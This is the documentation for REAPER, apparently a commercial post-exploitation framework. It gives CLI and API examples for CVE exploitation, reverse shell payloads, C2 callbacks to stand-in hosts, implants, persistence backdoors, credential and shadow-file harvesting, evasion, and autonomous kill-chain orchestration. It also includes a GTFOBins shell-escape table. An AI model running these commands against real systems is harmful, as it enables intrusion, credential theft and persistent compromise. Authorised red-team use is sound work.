Red Specter REAPER

Post-Exploitation & Offensive Operations Framework — 9 modules. 5,267 tests. Full kill chain.

v1.0.0
Contents
Overview Installation Quick Start CLI Reference Module: EXPLOIT Module: PAYLOAD Module: C2 Module: IMPLANT Module: PRIVESC Module: LATERAL Module: PERSIST Module: HARVEST Module: EVASION UNLEASHED Mode WRAITH Integration NEMESIS Integration API Reference Signature Database Disclaimer

Overview

REAPER is a post-exploitation and offensive operations framework. Nine modules covering the full kill chain from initial exploitation through persistence, lateral movement, credential harvesting, and evasion. Every capability built from scratch in pure Python. No Metasploit. No Cobalt Strike. No Empire. Pure engineering.

Nine modules. 5,267 tests. 55 CVE exploits. 14 evasion techniques. 10 persistence methods per platform. When REAPER engages a target, every exploit, every implant, every evasion technique is Python code that Red Specter wrote — not a wrapper around someone else's framework.

9 Modules Exploit, Payload, C2, Implant, PrivEsc, Lateral, Persist, Harvest, Evasion.
5,267 Tests Full test coverage across every module and capability.
55 CVE Exploits Real vulnerability exploitation with version-matched targeting.
Full Kill Chain Initial access through persistence, movement, and exfiltration.

Installation

PyPI

$ pip install red-specter-reaper

Docker

$ docker pull redspecter/reaper:latest $ docker run --rm -it redspecter/reaper exploit --target 192.168.1.1

Debian

$ dpkg -i red-specter-reaper_1.0.0_amd64.deb

PKGBUILD (BlackArch / Arch)

$ makepkg -si

Or from source:

$ git clone <repo> $ cd red-specter-reaper $ pip install -e ".[dev]"

Quick Start

# Exploit a target $ reaper exploit --target 192.168.1.1 --cve CVE-2024-1234 # Full engagement — scan, exploit, persist $ reaper engage --target 192.168.1.0/24 --mode full # Generate payload $ reaper payload --type reverse_shell --format elf --lhost 10.0.0.1 # Start C2 listener $ reaper c2 --listen --port 443 --protocol https # Harvest credentials $ reaper harvest --target 192.168.1.1 --session active-session-01 # UNLEASHED mode $ reaper engage --target 192.168.1.0/24 --override --confirm-destroy

CLI Reference

Commands

CommandDescription
reaper exploit <opts>Exploit a target using CVE or auto-detection
reaper engage <opts>Full engagement — scan, exploit, persist, harvest
reaper payload <opts>Generate payloads and implants
reaper c2 <opts>Start/manage C2 listeners and sessions
reaper implant <opts>Deploy and manage implants on targets
reaper privesc <opts>Enumerate and exploit privilege escalation vectors
reaper lateral <opts>Lateral movement across the network
reaper persist <opts>Install, verify, or remove persistence mechanisms
reaper harvest <opts>Extract credentials, secrets, and sensitive data
reaper evasion <opts>Apply evasion techniques to payloads and operations
reaper statusShow active sessions, listeners, and implants

Global Options

FlagDescription
--targetTarget IP, hostname, CIDR range, or URL
--modestandard, stealth, aggressive, full
--sessionSession name or ID to operate on
--timeoutOperation timeout (seconds)
--outputOutput directory for reports and artefacts
--overrideUNLEASHED dry-run
--confirm-destroyUNLEASHED live execution
--wraith-reportIngest WRAITH scan report as reconnaissance input
--verboseVerbose output with detailed operation logging
--quietSuppress non-essential output

Module: EXPLOIT

CVE-based exploitation engine with 55 real vulnerabilities. Version-matched targeting with automatic exploit selection. Every exploit written from scratch — no Metasploit modules, no borrowed code.

01 EXPLOIT reaper exploit
# Check target for exploitable services $ reaper exploit --target 192.168.1.1 --check # Exploit specific CVE $ reaper exploit --target 192.168.1.1 --cve CVE-2024-1234 # Auto-exploit all discovered vulnerabilities $ reaper exploit --target 192.168.1.1 --auto

Module: PAYLOAD

Payload generation engine supporting multiple payload types and output formats. Generates reverse shells, bind shells, stagers, and full implants with configurable options.

02 PAYLOAD reaper payload
# Generate reverse shell (ELF) $ reaper payload --type reverse_shell --format elf --lhost 10.0.0.1 --lport 4444 # Generate implant with evasion $ reaper payload --implant --format python --c2 https://c2.example.com --evasion

Module: C2

Command and control infrastructure. Multi-protocol listener support with encrypted session management. Handles implant callbacks, task distribution, and result collection.

03 C2 reaper c2
# Start HTTPS listener $ reaper c2 --listen --port 443 --protocol https # Start DNS listener $ reaper c2 --listen --port 53 --protocol dns --domain c2.example.com # List active sessions $ reaper c2 --sessions # Interact with session $ reaper c2 --interact session-01

Module: IMPLANT

Deployable agents with two variants: full-featured for long-term operations and minimal for constrained environments. 10 built-in capabilities with modular architecture.

04 IMPLANT reaper implant
# Deploy full implant $ reaper implant --deploy --variant full --target 192.168.1.1 --session session-01 # Deploy minimal implant $ reaper implant --deploy --variant minimal --target 192.168.1.1 # List active implants $ reaper implant --list

Module: PRIVESC

Privilege escalation enumeration and exploitation. GTFOBins integration, Linux kernel checks, and Windows LOLBAS techniques. Suggests and executes escalation paths automatically.

05 PRIVESC reaper privesc
# Enumerate escalation vectors $ reaper privesc --target 192.168.1.1 --enumerate # Suggest best escalation path $ reaper privesc --target 192.168.1.1 --suggest # Auto-escalate $ reaper privesc --target 192.168.1.1 --auto --session session-01

Module: LATERAL

Network lateral movement via SSH, SMB, and tunnelling. Credential reuse, port forwarding, and SOCKS proxy support for pivoting through compromised hosts.

06 LATERAL reaper lateral
# SSH lateral movement $ reaper lateral --method ssh --target 192.168.1.50 --creds harvested.json # SMB with credential spray $ reaper lateral --method smb --target 192.168.1.0/24 --spray # SOCKS proxy through pivot $ reaper lateral --socks --port 1080 --session session-01 # Port forward $ reaper lateral --forward 8080:10.0.0.5:80 --session session-01

Module: PERSIST

Persistence installation across Linux and Windows with stealth ratings. Install, verify, and remove persistence mechanisms. Every method rated for detection risk.

07 PERSIST reaper persist
PlatformMethodStealth
LinuxcrontabMEDIUM
Linuxsystemd serviceMEDIUM
Linux.bashrc/.profileLOW
LinuxSSH authorized_keysLOW
LinuxLD_PRELOADHIGH
LinuxPAM backdoorHIGH
WindowsRegistry Run keysLOW
WindowsScheduled TasksMEDIUM
WindowsWMI event subscriptionHIGH
WindowsCOM object hijackingHIGH
# Install persistence (Linux crontab) $ reaper persist --install --method crontab --session session-01 # Verify persistence is active $ reaper persist --verify --session session-01 # Remove all persistence $ reaper persist --remove --all --session session-01

Module: HARVEST

Credential extraction and secrets harvesting. Searches 35 Linux and 10 Windows credential paths. 25 regex-based secret patterns for configuration files. Shadow file extraction with hash cracking preparation.

08 HARVEST reaper harvest
# Harvest all credentials $ reaper harvest --target 192.168.1.1 --session session-01 # Harvest specific type $ reaper harvest --type ssh_keys --session session-01 # Extract shadow file $ reaper harvest --shadow --session session-01 # Scan config files for secrets $ reaper harvest --secrets --path /opt/app/ --session session-01

Module: EVASION

14 evasion techniques with a pipeline API for chaining. Polymorphic engine generates unique variants on every build. Anti-analysis capabilities detect sandboxes and debuggers.

09 EVASION reaper evasion
14 Techniques From string obfuscation to syscall unhooking
Pipeline API Chain techniques for layered evasion
Polymorphic Engine Every build is structurally unique
Anti-Analysis VM, sandbox, and debugger detection
# Apply evasion pipeline to payload $ reaper evasion --input payload.bin --techniques obfuscate,encrypt,dead_code # Polymorphic generation $ reaper evasion --input payload.bin --polymorphic --count 5 # Auto-evasion for target environment $ reaper evasion --auto --session session-01

REAPER UNLEASHED

Three-tier gating. Ed25519 private key controlled. One operator. Founder's machine only.

Standard mode simulates and reports. UNLEASHED mode executes live. Full exploitation chains. Live persistence. Real credential extraction. The difference is not cosmetic — it is operational.

Three-Tier Gating

Ed25519 Key Setup

# Generate UNLEASHED key pair $ reaper keygen --algo ed25519 --output ~/.reaper/keys/ # Set key path $ export REAPER_KEY=~/.reaper/keys/reaper_ed25519
CapabilityStandardUNLEASHED
ExploitationCheck onlyLive exploit execution
Payload deliverySimulatedReal payload deployment
C2 channelsDisabledActive C2 with encryption
PersistenceReport onlyLive installation
Credential harvestPath enumerationFull extraction
Lateral movementDiscovery onlyActive pivoting
EvasionAnalysis onlyLive evasion pipeline
Key requiredNoEd25519

UNLEASHED mode is restricted to authorised operators with Ed25519 private key access. Live execution against any target must only occur in authorised test environments with explicit written permission. Unauthorised use of UNLEASHED mode constitutes illegal access and may violate applicable law.

WRAITH Integration

REAPER ingests WRAITH reconnaissance reports via the --wraith-report flag. WRAITH discovers. REAPER exploits. The chain is seamless.

01 WRAITH Discovers
02 REAPER Exploits
03 PERSIST Holds
04 HARVEST Extracts
# Run WRAITH scan first $ wraith scan https://target.com --output ./recon # Feed WRAITH report into REAPER $ reaper engage --wraith-report ./recon/wraith-report.json --mode full # REAPER auto-maps WRAITH findings to exploits # Ports + services → exploit selection # CVE matches → targeted exploitation # Default creds → credential reuse for lateral movement
Port & Service Mapping WRAITH port data drives REAPER exploit selection
CVE Chain WRAITH CVE matches feed directly into REAPER exploitation
Credential Reuse WRAITH default creds enable REAPER lateral movement
SSL Weaknesses WRAITH SSL findings inform REAPER C2 channel selection

NEMESIS Integration

REAPER operates as a NEMESIS weapon via the ReaperWeapon class. The Supreme Commander orchestrates REAPER alongside the other 12 weapons — selecting targets, chaining exploits, and coordinating post-exploitation across the full engagement.

01 WRAITH Recon
02 NEMESIS Commands
03 REAPER Executes
04 REPORT Documents

The Supreme Commander analyses reconnaissance data, selects REAPER as the post-exploitation weapon, and orchestrates the full kill chain autonomously. REAPER reports results back to NEMESIS for cross-weapon correlation and multi-stage campaign management.

ReaperWeapon Class NEMESIS weapon interface for Supreme Commander orchestration
Autonomous Chaining Supreme Commander chains REAPER with other weapons automatically
Result Correlation REAPER findings feed back into NEMESIS campaign intelligence
Multi-Stage Campaigns NEMESIS coordinates REAPER across multiple targets and phases

API Reference

Key classes and methods for programmatic use. Import directly from red_specter_reaper.

# Core imports from red_specter_reaper.exploit import ExploitEngine, check_target, exploit_target, auto_exploit from red_specter_reaper.payload import PayloadGenerator, PayloadType, PayloadFormat from red_specter_reaper.c2 import C2Server, Listener, Session from red_specter_reaper.implant import Implant, ImplantVariant from red_specter_reaper.privesc import PrivEscEngine, enumerate, suggest from red_specter_reaper.lateral import LateralEngine, SSHMover, SMBMover from red_specter_reaper.persist import PersistenceEngine, PersistMethod from red_specter_reaper.harvest import HarvestEngine, CredentialType from red_specter_reaper.evasion import EvasionEngine, EvasionPipeline

ExploitEngine

engine = ExploitEngine(target="192.168.1.1") # Check for exploitable services results = engine.check_target() # Exploit specific CVE result = engine.exploit_target(cve="CVE-2024-1234") # Auto-exploit all discovered vulnerabilities results = engine.auto_exploit()

PayloadGenerator

gen = PayloadGenerator() # Generate reverse shell payload = gen.generate( payload_type=PayloadType.REVERSE_SHELL, payload_format=PayloadFormat.ELF, lhost="10.0.0.1", lport=4444 ) # Generate implant implant = gen.generate_implant( variant=ImplantVariant.FULL, c2_url="https://c2.example.com", evasion=True )

EvasionPipeline

pipeline = EvasionPipeline() # Chain techniques result = pipeline.run( input_payload=payload_bytes, techniques=["obfuscate", "encrypt", "dead_code", "polymorphic"] ) # Polymorphic generation variants = pipeline.polymorphic(input_payload=payload_bytes, count=5)

HarvestEngine

harvester = HarvestEngine(session="session-01") # Harvest all credentials creds = harvester.harvest_all() # Extract shadow file shadow = harvester.extract_shadow() # Scan for secrets in config files secrets = harvester.scan_secrets(path="/opt/app/")

Signature Database

REAPER ships with offline databases for exploitation, privilege escalation, and credential harvesting. No API calls. No external lookups. Everything ships with the tool.

CVE Database (55 entries)

Real CVE exploits across web servers, databases, application frameworks, and network services. Each entry includes version range, exploit code, payload integration, and severity rating.

Web Servers Apache, nginx, IIS, Tomcat, Caddy
Databases MySQL, PostgreSQL, MongoDB, Redis, Elasticsearch
Frameworks Spring, Struts, Django, Laravel, Rails
Services OpenSSH, ProFTPD, Samba, RDP, VPN

GTFOBins Database (20 binaries)

BinaryEscalation VectorMethod
vimSUID / sudoShell escape via :!sh
findSUID / sudo-exec /bin/sh
pythonSUID / sudoos.system() shell spawn
nmapSUID / sudo--interactive or --script
awkSUID / sudosystem() call
lessSUID / sudo!sh from pager
tarSUID / sudo / wildcard--checkpoint-action
zipSUID / sudo-T -TT shell command
gitSUID / sudoPager shell escape
dockerGroup membershipMount host filesystem

Credential Paths

CategoryPlatformPaths
System credentialsLinux8
SSH keys & configsLinux5
Browser storesLinux6
Application configsLinux8
Cloud CLI configsLinux4
Keyrings & vaultsLinux4
SAM / SYSTEM / NTDSWindows3
LSA / credential vaultsWindows3
Browser & RDP storesWindows4

Secret Patterns (25 regex)

API Keys AWS, GCP, Azure, Stripe, SendGrid, Twilio
Tokens JWT, OAuth, Bearer, session tokens, refresh tokens
Credentials Password fields, connection strings, database URIs
Private Keys RSA, EC, Ed25519, PGP, SSH key blocks

Disclaimer

Red Specter REAPER is designed for authorised security testing, red team operations, and educational purposes only. You must have explicit written permission from the system owner before running any REAPER tool against a target. Post-exploitation operations carry significant risks including service disruption, data exposure, and persistent access to compromised systems. REAPER must only be used against systems you are authorised to test. Unauthorised use may violate the Computer Misuse Act 1990 (UK), the Computer Fraud and Abuse Act (US), or equivalent legislation in your jurisdiction. The authors accept no liability for misuse or damage resulting from improper use.